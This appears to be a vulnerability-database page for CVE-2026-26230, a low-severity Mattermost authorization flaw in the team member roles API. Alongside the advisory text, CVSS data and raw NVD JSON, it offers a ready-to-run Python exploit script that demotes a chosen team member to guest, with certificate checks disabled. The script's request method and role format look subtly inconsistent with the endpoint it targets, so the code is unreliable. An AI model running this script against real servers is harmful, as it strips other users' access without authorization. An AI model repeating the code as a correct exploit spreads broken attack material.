CVE-2026-26230

Description

Mattermost versions 10.11.x <= 10.11.10 fail to properly validate permission requirements in the team member roles API endpoint which allows team administrators to demote members to guest role. Mattermost Advisory ID: MMSA-2025-00531

CVSS Details

CVSS Score

3.8

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE

Mattermost 10.11.x < 10.11.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-26230 PoC - Mattermost Team Role API Authorization Bypass
# Target: Mattermost versions 10.11.x <= 10.11.10

def exploit_mattermost_role_demotion(target_url, auth_token, team_id, target_user_id):
    """
    Exploit for CVE-2026-26230
    This PoC demonstrates how a team admin can demote members to guest role
    by exploiting improper authorization in team member roles API endpoint
    """
    
    api_endpoint = f"{target_url}/api/v4/teams/{team_id}/members/{target_user_id}/roles"
    
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "Content-Type": "application/json"
    }
    
    # Payload to demote user from member to guest role
    payload = {
        "roles": ["guest"]
    }
    
    try:
        response = requests.post(api_endpoint, headers=headers, json=payload, verify=False)
        
        if response.status_code == 200:
            print(f"[+] SUCCESS: User {target_user_id} demoted to guest role")
            print(f"[+] Response: {response.json()}")
            return True
        else:
            print(f"[-] FAILED: Status code {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {e}")
        return False

# Example usage
if __name__ == "__main__":
    TARGET = "https://mattermost.example.com"
    TOKEN = "your_team_admin_token"
    TEAM_ID = "target_team_id"
    USER_ID = "target_user_id_to_demote"
    
    exploit_mattermost_role_demotion(TARGET, TOKEN, TEAM_ID, USER_ID)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-26230
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-26230
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-26230/
[4] VulDB https://vuldb.com/cve/CVE-2026-26230
[5] https://mattermost.com/security-updates

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-26230", "sourceIdentifier": "[email protected]", "published": "2026-03-16T21:16:33.480", "lastModified": "2026-03-18T13:56:13.130", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.10 fail to properly validate permission requirements in the team member roles API endpoint which allows team administrators to demote members to guest role. Mattermost Advisory ID: MMSA-2025-00531"}, {"lang": "es", "value": "Las versiones de Mattermost 10.11.x <= 10.11.10 no validan correctamente los requisitos de permisos en el endpoint de la API de roles de miembros del equipo, lo que permite a los administradores del equipo degradar a los miembros al rol de invitado. ID de Aviso de Mattermost: MMSA-2025-00531"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.11", "matchCriteriaId": "B6E5F368-358C-429B-8F04-3C8DF4A71A91"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}